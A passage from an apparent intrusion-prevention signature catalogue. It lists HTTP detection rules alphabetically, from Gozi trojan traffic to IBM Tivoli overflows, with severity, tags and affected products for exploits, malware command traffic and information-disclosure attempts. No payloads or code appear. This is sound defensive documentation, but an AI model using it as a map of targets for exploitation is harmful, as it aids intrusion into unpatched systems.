Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1428-5242
Vulnerability: Gozi-Malware-Infection-Traffic
Description:
Back to top

HTTP_CSU-Gozi-Prinimalka-Trojan-Activity-Detected

About this situation: Gozi Prinimalka Trojan activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Gozi-Prinimalka-Trojan
Description:
Back to top

HTTP_CSU-Grafana-HS-Pluginmarkdown-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Grafana Labs Grafana detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Vulnerability: Grafana-HS-Pluginmarkdown-Directory-Traversal
Description:
Back to top

HTTP_CSU-Grafana-Labs-Grafana-Snapshot-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Grafana Labs Grafana detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1439-5242
Last changed: sgpkg-ips-1439-5242
Vulnerability: Grafana-Labs-Grafana-Snapshot-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Grafana-Local-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Grafana detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Grafana, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Grafana-Local-File-Inclusion
Description:
Back to top

HTTP_CSU-Graylog-Open-Cluster-Configuration-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Graylog Open detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Graylog Open, CVE2024, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Graylog-Open-Cluster-Configuration-Insecure-Deserialization
Description:
Back to top

HTTP_CSU-Hadooken-Malware-Activity

About this situation: An attempt to exploit a vulnerability in Hadooken Malware detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Hadooken Malware, Any Operating System not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Vulnerability: Hadooken-Malware-Activity
Description:
Back to top

HTTP_CSU-Harbour-Networks-Routers-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Harbour Networks router detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Harbour Networks routers, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Harbour-Networks-Routers-Information-Disclosure
Description:
Back to top

HTTP_CSU-Harnig-Activity-Detected

About this situation: Harnig activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Harnig
Description:
Back to top

HTTP_CSU-Headline-Portal-Engine-Php-Remote-File-Inclusion

About this situation: Detected an attempt to exploit a vulnerability in Headline Portal Engine
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Headline Portal Engine, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Headline-Portal-Engine-Php-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Heloag-Activity

About this situation: Heloag activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Heloag
Description:
Back to top

HTTP_CSU-HiatusRAT-Malware-C2-Traffic

About this situation: HiatusRAT malware activity detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, HiatusRAT, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: HiatusRAT-Malware-C2-Traffic
Description:
Back to top

HTTP_CSU-Hikvision-IP-Camera-Unauthenticated-Password-Change

About this situation: An attempt to exploit a vulnerability in Hikvision IP Cameras detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Hikvision, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: Hikvision-IP-Camera-Unauthenticated-Password-Change
Description:
Back to top

HTTP_CSU-Hiloti-Activity

About this situation: Hiloti activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Hiloti
Description:
Back to top

HTTP_CSU-Hosting-Controller-HCDiskQuotaService-Access

About this situation: HCDiskQuotaService.csv accessed in Hosting Controller
Context: HTTP Request URI
Severity: 2
Tags: Windows, x86, Hosting Controller, CVE2005, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Hosting-Controller-Information-Disclosure
Description:
Back to top

HTTP_CSU-Hotbar-Activity

About this situation: Hotbar Internet Explorer toolbar activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Hotbar, Windows not specific, Hotbar not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Hotbar
Description:
Back to top

HTTP_CSU-HP-IMC-Faultdownloadservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2012, Any Operating System not specific, HP Intelligent Management Center not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HP-Intelligent-Management-Center-Faultdownloadservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-IMC-Ictdownloadservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2012, Any Operating System not specific, HP Intelligent Management Center not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HP-Intelligent-Management-Center-Ictdownloadservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-IMC-Syslogdownloadservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2012, Any Operating System not specific, HP Intelligent Management Center not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1621-5242
Vulnerability: HP-Intelligent-Management-Center-Syslogdownloadservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP IMC Branch Intelligent Management System Software Module (BIMS) detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2013, Any Operating System not specific, HP Intelligent Management Center not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HP-Intelligent-Management-Center-Bimsdownload-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-Intelligent-Management-Center-Database-Information-Disclosure

About this situation: Attempt to exploit a policy bypass vulnerability in HP Intelligent Management Center
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-314-4219
Last changed: sgpkg-ips-1225-5242
Vulnerability: HP-Intelligent-Management-Center-Database-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2012, Any Operating System not specific, HP Intelligent Management Center not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HP-Intelligent-Management-Center-Downloadservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-Intelligent-Management-Center-Reportimgservlet-Disclosure

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2012, Any Operating System not specific, HP Intelligent Management Center not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HP-Intelligent-Management-Center-Reportimgservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in HP IMC Service Operation Management Software Module detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2013, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1344-5242
Vulnerability: HP-Intelligent-Management-Center-Sdfiledownload-Information-Disclosure
Description:
Back to top

HTTP_CSU-HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in HP IMC Service Operation Management Software Module detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2013, Any Operating System not specific, HP Intelligent Management Center not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-551-5211
Last changed: sgpkg-ips-551-5211
Vulnerability: HP-Intelligent-Management-Center-Som-Euaccountserivce-Authentication-Bypass
Description:
Back to top

HTTP_CSU-HP-Network-Virtualization-Storedntxfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Network Virtualization detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Network Virtualization, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1640-5242
Vulnerability: HP-Network-Virtualization-Storedntxfile-Directory-Traversal
Description:
Back to top

HTTP_CSU-HP-Network-Virtualization-toServerObject-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in HP Network Virtualization detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP Network Virtualization, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: HP-Network-Virtualization-toServerObject-Directory-Traversal
Description:
Back to top

HTTP_CSU-HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager (OV NNM) detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1720-5242
Vulnerability: HTTP_HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow
Description:
Back to top

HTTP_CSU-HP-OpenView-Network-Node-Manager-Command-Execution

About this situation: Command execution exploit against HP OpenView Network Node Manager
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Command-Execution
Description:
Back to top

HTTP_CSU-HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-445-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Openview5-Cgi-Buffer-Overflow
Description:
Back to top

HTTP_CSU-HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Handling-BOF

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-405-4219
Vulnerability: HP-OpenView-Network-Node-Manager-Toolbar.exe-Cgi-Buffer-Overflow
Description:
Back to top

HTTP_CSU-HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Webappmon.exe-BOF
Description:
Back to top

HTTP_CSU-HP-System-Management-Homepage-Iprange-Parameter-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP System Management Homepage (SMH) detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, HP System Management Homepage, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: HP-System-Management-Homepage-Iprange-Parameter-Code-Execution
Description:
Back to top

HTTP_CSU-HPE-Intelligent-Management-Center-Iccselectdevtypebean-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: HPE-IMC-Iccselectdevtypebean-Expression-Language-Injection
Description:
Back to top

HTTP_CSU-HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: HPE-Intelligent-Management-Center-Urlaccesscontroller-Authentication-Bypass
Description:
Back to top

HTTP_CSU-HPE-Network-Automation-Permissionfilter-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in HPE Network Automation detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HPE Network Automation, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1640-5242
Vulnerability: HPE-Network-Automation-Permissionfilter-Authentication-Bypass
Description:
Back to top

HTTP_CSU-HPE-Network-Automation-SQL-Injection-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in HPE Network Automation detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Solaris, Linux, Any Hardware, HPE Network Automation, CVE2017, Windows not specific, Solaris not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-1640-5242
Vulnerability: HPE-Network-Automation-SQL-Injection-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-HTML-Tags-As-URI-Parameters

About this situation: HTML tags in HTTP POST request detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1010-5242
Description:
Back to top

HTTP_CSU-HTTP-Request-Command-Execution

About this situation: A possible attempt to run remote commands
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: HTTP-Request-Command-Execution
Description:
Back to top

HTTP_CSU-HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow

About this situation: HTTPDX HTTP Server 1.4 Stack Based Buffer Overflow
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, HTTPDX HTTP Server, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-654-5211
Vulnerability: HTTPDX-HTTP-Server-1.4-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CSU-HTTPDX-TOLOG-Function-Format-String

About this situation: An attempt to exploit an HTTPDX TOLOG Function Format String vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Windows XP SP3, Any Hardware, HTTPDX HTTP Server, CVE2009, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: HTTPDX-TOLOG-Function-Format-String
Description:
Back to top

HTTP_CSU-Huawei-SOHO-Router-Information-Disclosure

About this situation: An attempt to exploit a Huawei SOHO Router Information Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Huawei SOHO Router, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: Huawei-SOHO-Router-Information-Disclosure
Description:
Back to top

HTTP_CSU-IBM-BigFix-Relay-Servers-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in IBM BigFix Relay Servers detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IBM BigFix, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: IBM-BigFix-Relay-Servers-Information-Disclosure
Description:
Back to top

HTTP_CSU-IBM-Data-Risk-Manager-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in IBM Data Risk Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Data Risk Manager, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: IBM-Data-Risk-Manager-Authentication-Bypass
Description:
Back to top

HTTP_CSU-IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in IBM Systems Director detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Systems Director, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: IBM-Director-CIM-Server-Consumer-Name-Handling-Denial-Of-Service
Description:
Back to top

HTTP_CSU-IBM-Domino-Access

About this situation: Suspected vulnerability probe of an IBM Domino Server
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, IBM Domino, Windows not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1784-5242
Vulnerability: HTTP-Domino-Access
Description:
Back to top

HTTP_CSU-IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in IBM Lotus Domino Web Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Domino Web Server, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: IBM-Lotus-Domino-Web-Server-URL-Accessing-Denial-of-Service
Description:
Back to top

HTTP_CSU-IBM-Lotus-Domino-Web-Service-Denial-Of-Service

About this situation: Detects denial of service exploits against Lotus Domino
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2005, Any Operating System not specific, Lotus Domino not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1399-5242
Vulnerability: HTTP-IBM-Lotus-Domino-Web-Service-Denial-Of-Service
Description:
Back to top

HTTP_CSU-IBM-Lotus-Sametime-Information-Disclosure

About this situation: An possible attempt to exploit an IBM Lotus Sametime Information Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, IBM Lotus Sametime, CVE2013, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-761-5211
Last changed: sgpkg-ips-761-5211
Vulnerability: IBM-Lotus-Sametime-Information-Disclosure
Description:
Back to top

HTTP_CSU-IBM-Lotus-Sametime-Room-Name-BruteForce

About this situation: An attempt to exploit an IBM Lotus Sametime Room Name Bruteforce vulnerability detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, IBM Lotus Sametime, CVE2013, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-1258-5242
Vulnerability: IBM-Lotus-Sametime-Room-Name-BruteForce
Description:
Back to top

HTTP_CSU-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the Community Services Multiplexer component of IBM Lotus Sametime detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Sametime, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: HTTP-IBM-Lotus-Sametime-Server-Multiplexer-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSU-IBM-Lotus-Sametime-User-Enumeration

About this situation: An attempt to exploit an IBM Lotus Sametime User Enumeration vulnerability detected.
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, IBM Lotus Sametime, CVE2013, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-763-5211
Last changed: sgpkg-ips-1258-5242
Vulnerability: IBM-Lotus-Sametime-User-Enumeration
Description:
Back to top

HTTP_CSU-IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in IBM Rational Focal Point detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, IBM Focal Point, CVE2013, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: IBM-Rational-Focal-Point-Requestaccesscontroller-Servlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-IBM-Tivoli-Provisioning-Manager-OS-Deployment-BOF

About this situation: Attempt to exploit buffer overflow in IBM Tivoli Provisioning Manager detected
Context: HTTP Request URI
Severity: 10
